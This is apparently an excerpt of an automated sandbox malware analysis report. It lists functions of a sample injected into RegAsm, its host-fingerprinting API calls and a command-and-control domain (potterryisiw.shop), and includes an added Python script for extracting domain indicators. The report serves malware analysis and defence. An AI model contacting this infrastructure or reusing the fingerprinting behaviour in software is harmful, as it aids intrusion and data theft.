GetVolumeInformationW 11617->11618 11819 409530 11822 409539 11819->11822 11820 40954a 11821 40958d ExitProcess 11820->11821 11822->11820 11823 409555 11822->11823 11831 40a580 11822->11831 11824 409560 11823->11824 11838 43a840 11824->11838 11827 40958b 11827->11821 11828 40955c 11828->11824 11829 40957f 11828->11829 11837 40c440 FreeLibrary 11829->11837 11832 40a6d7 LoadLibraryExW 11831->11832 11833 40a67f 11831->11833 11835 40a714 11832->11835 11833->11832 11834 40a9fd GetProcessVersion 11836 40a71b 11834->11836 11835->11834 11835->11836 11836->11828 11837->11824 11841 43c3b0 11838->11841 11840 43a845 FreeLibrary 11840->11827 11842 43c3b9 11841->11842 11842->11840 11843 4188b1 11848 4193b0 11843->11848 11845 4188c3 11846 4193b0 LdrInitializeThunk 11845->11846 11847 4188db 11846->11847 11849 419455 11848->11849 11850 41bfe0 LdrInitializeThunk 11849->11850 11851 419869 11850->11851 11852 41e0b0 11853 41e10f 11852->11853 11854 41e0bc 11852->11854 11855 41bfe0 LdrInitializeThunk 11854->11855 11855->11853 11624 42d670 11626 42d675 11624->11626 11625 42d745 SysAllocString 11626->11625 11626->11626 11856 413bb2 11857 413bbf 11856->11857 11860 417160 11857->11860 11859 413bd2 11861 417180 11860->11861 11862 43d4f0 LdrInitializeThunk 11861->11862 11863 41735a 11862->11863 11627 43aa76 RtlReAllocateHeap 11628 4133f4 11631 41bfe0 11628->11631 11632 41c100 LdrInitializeThunk 11631->11632 11633 41c02e 11632->11633 11639 4103f7 GetSystemDirectoryW 11640 410421 11639->11640 11864 41233a 11865 412343 11864->11865 11866 4199d0 LdrInitializeThunk 11865->11866 11867 412353 11866->11867 11868 4199d0 LdrInitializeThunk 11867->11868 11869 412379 11868->11869

        Control-flow Graph

        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
        • String ID: $\D
        • API String ID: 1449868515-2336249234
        • Opcode ID: b2f1c2b85b67d381075e055d1e0933cb9c3f677de63a2a07af62926eb1445558
        • Instruction ID: b39d5cbee03da8dfb07941cdd59d89a9ce7e80d2681e5ab4337a2764b7f1900d
        • Opcode Fuzzy Hash: b2f1c2b85b67d381075e055d1e0933cb9c3f677de63a2a07af62926eb1445558
        • Instruction Fuzzy Hash: 48A14FB45193848FE360EF24D54879FBBF0BB86348F51892EE4899B350DBB99448CB47

        Control-flow Graph

        control_flow_graph 327 40ff30-40ff75 328 40ffd6-41005b 327->328 329 40ff77 327->329 331 4100b5-4100c6 328->331 332 41005d-41005f 328->332 330 40ff80-40ffd4 329->330 330->328 330->330 334 4100c8-4100cf 331->334 335 4100db-4100e3 331->335 333 410060-4100b3 332->333 333->331 333->333 336 4100d0-4100d9 334->336 337 4100e5-4100e6 335->337 338 4100fb-410108 335->338 336->335 336->336 339 4100f0-4100f9 337->339 340 41012b-410133 338->340 341 41010a-410111 338->341 339->338 339->339 343 410135-410136 340->343 344 41014b-41028a 340->344 342 410120-410129 341->342 342->340 342->342 345 410140-410149 343->345 346 4102e0-41032d 344->346 347 41028c-41028f 344->347 345->344 345->345 349 41032f 346->349 350 41038e-4103b5 call 40c450 346->350 348 410290-4102de 347->348 348->346 348->348 351 410330-41038c 349->351 353 4103ba-4103d4 350->353 351->350 351->351
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: $68$)(8p$)(8p$1$%8$9/cS$:-*+$<*-8$?>~)$potterryisiw.shop
        • API String ID: 0-1479513362
        • Opcode ID: 8d0051421ae3087eeb1e994f1559e5d92f53fbc8246a7fe36ee3717cc4b690b8
        • Instruction ID: a16be8e964f36d79c9f861597187d9fd2e43ad97ed143db0b067413bddb66209
        • Opcode Fuzzy Hash: 8d0051421ae3087eeb1e994f1559e5d92f53fbc8246a7fe36ee3717cc4b690b8
        • Instruction Fuzzy Hash: 7FB188B05083C08BD332CF25C4947DBBBE5AFD6704F584A4DD4C85B252C7795A89CBAA
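        Every function entry in this section has the same fixed layout: optional API bullets ("Name.MODULE(args), ref: address"), the Memory Dump Source whose first dotted field is the process index (00000000 for the original sample, 00000004 for the RegAsm process the payload was injected into), the Similarity fields, and a closing Instruction Fuzzy Hash. The String ID field of the entry above is a "$"-separated list in which the C2 domain potterryisiw.shop sits among junk tokens. The following Python is an added example, not Joe Sandbox code: it groups lines into entries, records process, APIs and strings per entry, and flags strings that look like domains. Its assumptions are that an entry ends at its Instruction Fuzzy Hash line, that "$" is the String ID separator (a "$" inside a real string would be split), and that the process index is the first dotted field of Source File; SAMPLE is constructed from lines copied above.

```python
"""Group this report's function listings into entries and flag domain-looking strings.

Added example, not Joe Sandbox code.  Assumptions: an entry ends at its
"Instruction Fuzzy Hash" line; "String ID" is a '$'-separated list; the
process index is the first dotted field of "Source File".
"""
import re

# "GetLastError.KERNEL32 ref: 00108560" has no argument list; subcall lines carry a prefix.
API_LINE = re.compile(
    r"^(?:Part of subcall function [0-9A-F]+: )?([\w:~]+)\.(\w+)(?:\(.*\))?,? ref: ([0-9A-F]+)$")
DOMAIN = re.compile(
    r"^(?=.{4,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I)

# Constructed sample: lines copied from three function entries in this report.
SAMPLE = """\
• Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID:
• String ID: $68$)(8p$)(8p$1$%8$9/cS$:-*+$<*-8$?>~)$potterryisiw.shop
• API String ID: 0-1479513362
• Instruction Fuzzy Hash: 7FB188B05083C08BD332CF25C4947DBBBE5AFD6704F584A4DD4C85B252C7795A89CBAA
APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042909C
• Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: InstalledMemoryPhysicallySystem
• String ID: 2PBd$AJ|2
• API String ID: 3960555810-3533766608
• Instruction Fuzzy Hash: 80D18C70204B528BD765CF39C1947A3FBE1BF56308F94496ED4EB8BA82C739A805CB54
• OffsetRect.USER32(00000000,00000000,00000000), ref: 001146F6
• Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• API ID: OffsetRect
• String ID: 0$Zatlat
• API String ID: 177026234-1547964091
• Instruction Fuzzy Hash: D291EE715083808BD314DF68C8597AFBBE0AFC9718F180A2CF5D89B692C7B5D588CB52
"""


def _new_entry():
    return {"process": None, "apis": [], "strings": [], "domains": [], "fuzzy": None}


def parse_entries(text):
    """Split the listing into per-function dicts; API lines precede their entry's fields."""
    entries, cur = [], _new_entry()
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        m = API_LINE.match(line)
        if m:
            cur["apis"].append(m.group(1))
        elif line.startswith("Source File: "):
            cur["process"] = int(line.split(": ", 1)[1].split(".", 1)[0])
        elif line.startswith("String ID:"):
            cur["strings"] = [s for s in line[len("String ID:"):].strip().split("$") if s]
            cur["domains"] = sorted({s.lower() for s in cur["strings"] if DOMAIN.match(s)})
        elif line.startswith("Instruction Fuzzy Hash: "):
            cur["fuzzy"] = line.split(": ", 1)[1]
            entries.append(cur)
            cur = _new_entry()
    return entries


def domain_hits(entries):
    """(process, domain, apis) for every entry whose strings contain a domain."""
    return [(e["process"], d, e["apis"]) for e in entries for d in e["domains"]]


if __name__ == "__main__":
    for proc, domain, apis in domain_hits(parse_entries(SAMPLE)):
        print(f"process {proc}: {domain} (APIs in same function: {apis or 'none'})")
```

        A domain that appears only in the injected process (index 4) and not in the original sample (index 0) is the usual sign that it came from the decrypted second stage, which is worth recording with the IOC.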

        Control-flow Graph

        control_flow_graph 689 428a88-428ad6 690 428b24-428b2d 689->690 691 428ad8 689->691 693 428b4b-428fc6 690->693 694 428b2f-428b35 690->694 692 428ae0-428b22 691->692 692->690 692->692 697 429014-42901d 693->697 698 428fc8 693->698 696 428b40-428b49 694->696 696->693 696->696 700 42903b-429045 call 436750 697->700 701 42901f-429025 697->701 699 428fd0-429012 698->699 699->697 699->699 704 42904a-429056 700->704 702 429030-429039 701->702 702->700 702->702 705 42906b-42908d call 43ca00 704->705 706 429058-42905f 704->706 709 429092-4290b7 GetPhysicallyInstalledSystemMemory 705->709 707 429060-429069 706->707 707->705 707->707 710 4290b9-4290c2 709->710 711 42910e-42911b 709->711 713 4290c4 710->713 714 42911d-429122 710->714 712 429133-42916e 711->712 718 429170-4291b6 712->718 719 4291b8-4291f4 712->719 715 4290d0-4290fa 713->715 716 429101-42910c 714->716 717 429124-429130 714->717 715->715 720 4290fc-4290ff 715->720 716->712 717->712 718->718 718->719 721 4291f6 719->721 722 42923f-429248 719->722 720->716 720->717 723 429200-42923d 721->723 724 42924a-429252 722->724 725 42926d 722->725 723->722 723->723 727 429260-429269 724->727 726 42926f-429279 725->726 728 42928b-429299 726->728 729 42927b-42927f 726->729 727->727 730 42926b 727->730 732 4292bb-429312 728->732 733 42929b-4292a1 728->733 731 429280-429289 729->731 730->726 731->728 731->731 735 429360-429369 732->735 736 429314 732->736 734 4292b0-4292b9 733->734 734->732 734->734 738 42938b-429397 735->738 739 42936b-429371 735->739 737 429320-42935e 736->737 737->735 737->737 741 4293ab-42943b 738->741 742 429399-42939f 738->742 740 429380-429389 739->740 740->738 740->740 743 4293a0-4293a9 742->743 743->741 743->743
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 2PBd$AJ|2
        • API String ID: 0-3533766608
        • Opcode ID: 369799990b9b17540f153d9db1cf456ce7f0a3d1c294660dc8c6111f9fa62616
        • Instruction ID: 9b81f59fa9fec819b079e7b5913faa27c40ffdab1ebfad8fc98c52ced06b53f7
        • Opcode Fuzzy Hash: 369799990b9b17540f153d9db1cf456ce7f0a3d1c294660dc8c6111f9fa62616
        • Instruction Fuzzy Hash: 88F17D70204B928BD365CF39C1947A3BBE1BF56304F94496ED4EB8B682D739B805CB54
        APIs
        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042909C
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InstalledMemoryPhysicallySystem
        • String ID: 2PBd$AJ|2
        • API String ID: 3960555810-3533766608
        • Opcode ID: a86de24d1fe8a22a5e152d4d1217ba225a352e4d395d0b13c18828c492104dac
        • Instruction ID: a3eb8938b1a25089ba207bdac1137d9776a66457ef97c196e7f02efb96e43ae3
        • Opcode Fuzzy Hash: a86de24d1fe8a22a5e152d4d1217ba225a352e4d395d0b13c18828c492104dac
        • Instruction Fuzzy Hash: 80D18C70204B528BD765CF39C1947A3FBE1BF56308F94496ED4EB8BA82C739A805CB54
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 6$yA
        • API String ID: 0-400021518
        • Opcode ID: dd5f72c7efeab64b3ea6f7782656cdd851f9face38727ff7eced69619e18c51e
        • Instruction ID: 0b1751d15af5afb3e28d85c507663cc984a9e5c4479d1d373b9566665f947d66
        • Opcode Fuzzy Hash: dd5f72c7efeab64b3ea6f7782656cdd851f9face38727ff7eced69619e18c51e
        • Instruction Fuzzy Hash: 8D91CDB59083819FD714CF28D48166BBBE1AFC5304F14892EF4A987392E778E845CB86
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: ,SB$2],_$iQPS
        • API String ID: 0-3375296685
        • Opcode ID: ca4f66a42113d4dd2ab0eb0a557acd9b6e144656a241f450f2f22fbd72e9482f
        • Instruction ID: d492b950c31d36bc158322ba794af411e8250915dafc2f7219c692af102e55f2
        • Opcode Fuzzy Hash: ca4f66a42113d4dd2ab0eb0a557acd9b6e144656a241f450f2f22fbd72e9482f
        • Instruction Fuzzy Hash: 0422A9716083618FC728CF14D8517ABB7E2FFC6308F444A2DE9999B381E7789945CB86
        APIs
        • LdrInitializeThunk.NTDLL(0043D6BC,005C003F,00000006,?,?,00000018,/.! ,?,ZsA), ref: 0043AAE6
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InitializeThunk
        • String ID: /.!
        • API String ID: 2994545307-1547124405
        • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
        • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
        • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
        • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: ,SB
        • API String ID: 0-3344058557
        • Opcode ID: d441079890dc1384fe02bfcbb57e10470465db8928aa69676c90a3fc055d3055
        • Instruction ID: 039eb5016f7fd78d533bc0fda36f1db4599208a88b8e264e670cb45d6bd72028
        • Opcode Fuzzy Hash: d441079890dc1384fe02bfcbb57e10470465db8928aa69676c90a3fc055d3055
        • Instruction Fuzzy Hash: B8B10F716183218BC724CF18D8517ABB3F1FFD6314F448A2DE8959B390E7799941CB86
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: HI
        • API String ID: 0-1987653318
        • Opcode ID: f7d7c7d0fe7cabde2995abf24001a65ad4c96508387fd75d75e371acc18e7a64
        • Instruction ID: f857ae79a21a44feeb6a15e9cef4c0f10714ff32f2e4065077ea1289013618f4
        • Opcode Fuzzy Hash: f7d7c7d0fe7cabde2995abf24001a65ad4c96508387fd75d75e371acc18e7a64
        • Instruction Fuzzy Hash: 854112755083118BC714CF18D8917ABB7F0EFC63A8F048A2DE8959B391E7389A45C7DA
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: je
        • API String ID: 0-3809674245
        • Opcode ID: 60b3f2acf2aec0acf9ebe96d09579e24ec3422f859f4800561d3aef034be247a
        • Instruction ID: 1c38fa654bc97001b06b9bb9048520a71f54be7c7481a91467ad0ed4b5e6a9de
        • Opcode Fuzzy Hash: 60b3f2acf2aec0acf9ebe96d09579e24ec3422f859f4800561d3aef034be247a
        • Instruction Fuzzy Hash: 3631CBB6A087419FD720DF18EC45BCAB3A5FB86349F00893DE49DC6242E73495168B8B
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c79a9aacfbe5e2f32c180dfdafc4f992fa23edefc5b1012d8cd9b8fb0a3f8593
        • Instruction ID: 6402e0bb3909fe31628bd0f5915123d94248cd459176ab4f2c7de53b55bc4d4e
        • Opcode Fuzzy Hash: c79a9aacfbe5e2f32c180dfdafc4f992fa23edefc5b1012d8cd9b8fb0a3f8593
        • Instruction Fuzzy Hash: 15718AB56083118BD728CF14D5A076BB7E2FFC9B14F044A1DE8866B381C7389D46CB9A
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f0472e055f3a4dff2055362c3bcedd2f213813839f96d446d9e6375fa51102b4
        • Instruction ID: bf0d0334412388f94e8498152736f63782817262afcc8546e4d5242f57d6667f
        • Opcode Fuzzy Hash: f0472e055f3a4dff2055362c3bcedd2f213813839f96d446d9e6375fa51102b4
        • Instruction Fuzzy Hash: 278167B56083818BD728DF11D4A4BABB7E2FFC5304F58896DE48A47251DB349941CB4A
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b8863c89b4a71dfb8782b38dca209a4b28dd68051076688180005815d0d7225e
        • Instruction ID: f5e873939d1550dce44615af20c07b6bf3e8be0c5ac98c4d3a91bc660a2ff0f2
        • Opcode Fuzzy Hash: b8863c89b4a71dfb8782b38dca209a4b28dd68051076688180005815d0d7225e
        • Instruction Fuzzy Hash: 3B51A2B05042029FD7049F28ED4971BBBA0FF45318F044939F45AA22E1D7B9E968DB8A
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 06262e27936995fc80322a3ed165d15c5e5b3e9162d3737f6739749793127dea
        • Instruction ID: a2ba0411b3cee10f4caaeae70949e410124a68cbc5d3df4400edfa96d4397e02
        • Opcode Fuzzy Hash: 06262e27936995fc80322a3ed165d15c5e5b3e9162d3737f6739749793127dea
        • Instruction Fuzzy Hash: FB217F742083058FD308CF15C890B2BB7E1EBC9308F64992DE5A5A77D1D339D80ADB9A
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5850b7b81a79914e313bc8c4bbea3dcb4f8226820c51b19553123e3cc9bfb04d
        • Instruction ID: 985886068b2e716356abbb17699c63c446eb292950ac11608e3e0ec2d72a3155
        • Opcode Fuzzy Hash: 5850b7b81a79914e313bc8c4bbea3dcb4f8226820c51b19553123e3cc9bfb04d
        • Instruction Fuzzy Hash: C0F058B55183408FD310DF28C45434BBBF0BF85308F01882DE98847390CB75A988CBCA

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoadProcessVersion
        • String ID: $!$!$"$#$%$'$'$'$'$)$+$,$-$-$-$/$/$/$0$1$2$3$5$5$6$7$9$:$;$=$=$?$?$?$A$B$C$E$G$I$K$M$O$T$W$Y$[$h$potterryisiw.shop$r$t$u$v$w$~
        • API String ID: 1829952579-2053576172
        • Opcode ID: 10e56e6316571805e3b496b34a46402a8848bc47858688e3e610be39b175c614
        • Instruction ID: 83e59cc675480a0f537e16db5dfb479b10fa2c63f7bafa7316ef033462da114d
        • Opcode Fuzzy Hash: 10e56e6316571805e3b496b34a46402a8848bc47858688e3e610be39b175c614
        • Instruction Fuzzy Hash: 2172F67010C7C1CAD331DB28844879BBFE0AB96324F044A6EE4E99B3D2D7798546DB5B

        Control-flow Graph

        APIs
        • FreeLibrary.KERNEL32(?), ref: 00428464
        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 004284A0
        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 004285CC
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: ComputerName$FreeLibrary
        • String ID: ESIZ
        • API String ID: 2243422189-1232186204
        • Opcode ID: 5fef9b3106bf94a8d3020770181974765055f3be71e4427543e8478773e5dcbb
        • Instruction ID: 107eeaf0f484fc26e1d056c6c5a96a53ad66f040f9949cd173fbe651eae6af85
        • Opcode Fuzzy Hash: 5fef9b3106bf94a8d3020770181974765055f3be71e4427543e8478773e5dcbb
        • Instruction Fuzzy Hash: 56F19E70105B518ED725CF34C894BE7BBE1AF16309F88486DC0FA8B282DB79B446CB59

        Control-flow Graph

        APIs
        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 004284A0
        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 004285CC
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: ComputerName
        • String ID: ESIZ
        • API String ID: 3545744682-1232186204
        • Opcode ID: c21be24aaba47a1ff64b0cb5ea4f6df0152d926d2a546ab2927edcf79d3b28ec
        • Instruction ID: caece19477bbeddae42eb6e9da0290b6207a0dc70146bc8faadc5ec4be251040
        • Opcode Fuzzy Hash: c21be24aaba47a1ff64b0cb5ea4f6df0152d926d2a546ab2927edcf79d3b28ec
        • Instruction Fuzzy Hash: 04027E70205B528FD725CF34C8907A7BBE1AF56304F98486ED0EA87782CB79B446CB55
        APIs
        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004368A9
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InformationVolume
        • String ID: C$\
        • API String ID: 2039140958-514332402
        • Opcode ID: c453d63eca7fa889acf43d4105d7dd8f59b0f5e53740a5b4c4497ad910ecf8eb
        • Instruction ID: 6bc66be043ab83f7e14e5e5f61a353f0f93fc06736be262c3079a6f27a06a90d
        • Opcode Fuzzy Hash: c453d63eca7fa889acf43d4105d7dd8f59b0f5e53740a5b4c4497ad910ecf8eb
        • Instruction Fuzzy Hash: DDF092B9294341BBE314DF20DC62F2A3294FB45B08F20482CB24BF61D0CBF4B9009A4E
        APIs
        Strings
        • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 00409562
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: ExitProcess
        • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
        • API String ID: 621844428-780655312
        • Opcode ID: 97be74b9bb0609293a5e55ee57a2341dfee3e9de6ada01080e19258a4a21601b
        • Instruction ID: 2ab813ea5f014a0b2211c64ac1eb16e07fc62c0c69bb2f1ca759e36280769154
        • Opcode Fuzzy Hash: 97be74b9bb0609293a5e55ee57a2341dfee3e9de6ada01080e19258a4a21601b
        • Instruction Fuzzy Hash: F0F082B2814210B5CA123BB79E0626F36A85E5535CF50083BED81B21C3EA3C4D1A97AF
        APIs
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocString
        • String ID:
        • API String ID: 2525500382-0
        • Opcode ID: 9c467ed3b848cf21e5e74aa2aaddb84ee9e7f911adc94d0ee280a7d56254f9bb
        • Instruction ID: bfdf1960619fe11e79ca71d1c60cc00dfd7c8e4f9b3430ffd1da66fae9831d2a
        • Opcode Fuzzy Hash: 9c467ed3b848cf21e5e74aa2aaddb84ee9e7f911adc94d0ee280a7d56254f9bb
        • Instruction Fuzzy Hash: FD41E460108F829ED366CB38C598742FBE1BB56214F048789D0AA8BB91D374B565CB92
        APIs
        • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 0043A7C1
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 2fc65689c9f4261c712c8d238fb41edd77dbdc3d5de3ef7c8eb14687863c5a44
        • Instruction ID: fa0cef23d453a3069a770009fd0405c4018592c7011080208cd168a447dc3778
        • Opcode Fuzzy Hash: 2fc65689c9f4261c712c8d238fb41edd77dbdc3d5de3ef7c8eb14687863c5a44
        • Instruction Fuzzy Hash: 09217F752406429FD328CF19C8A0A26B7F2FF99300B298A1DD0D297B55CB74F865CBC9
        APIs
        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043889F
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 5bcece1c03e78da2e9087ec5e943b8abd02f23127b79b626b8827565f725fe94
        • Instruction ID: 7be10c684662338dbfc0f8bce7f21e7d81a63dd3bdc270857606bdcfbec2d806
        • Opcode Fuzzy Hash: 5bcece1c03e78da2e9087ec5e943b8abd02f23127b79b626b8827565f725fe94
        • Instruction Fuzzy Hash: 8E11AC326082028BD304EF18C851B5ABBE5EB88718F08892CE0C8C73A1D779E855CB86
        APIs
        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004103FD
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: DirectorySystem
        • String ID:
        • API String ID: 2188284642-0
        • Opcode ID: 3d84e0c53d5a37151eea48f4afb3fac4d165dcdf4433bc3406452530f76cb1d0
        • Instruction ID: 7cc36ceb920871c8c6d66fd4276466350dc9c8e231d8d33e6ab260e294c182e7
        • Opcode Fuzzy Hash: 3d84e0c53d5a37151eea48f4afb3fac4d165dcdf4433bc3406452530f76cb1d0
        • Instruction Fuzzy Hash: 74F04CF49042914BC7348B109CE167F3394AF55308F05003FD586C6312DA785CC5C619
        APIs
        • GetLogicalDrives.KERNELBASE ref: 0043A100
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: DrivesLogical
        • String ID:
        • API String ID: 999431828-0
        • Opcode ID: 6789bf0cf5d3ba422bce8a14c70c0bd7b7677a90bc5732cded0f2e40de171061
        • Instruction ID: 4d5d26bab624afb83cf63971fe22b474cca0126a6a3e433b0c01ad88c01b978a
        • Opcode Fuzzy Hash: 6789bf0cf5d3ba422bce8a14c70c0bd7b7677a90bc5732cded0f2e40de171061
        • Instruction Fuzzy Hash: 7AE032B96002018BC324CF20E882922F7E5FB4E304314693ED986D7741D634E805CB48
        APIs
        • RtlFreeHeap.NTDLL(?,00000000), ref: 004389C8
        Memory Dump Source
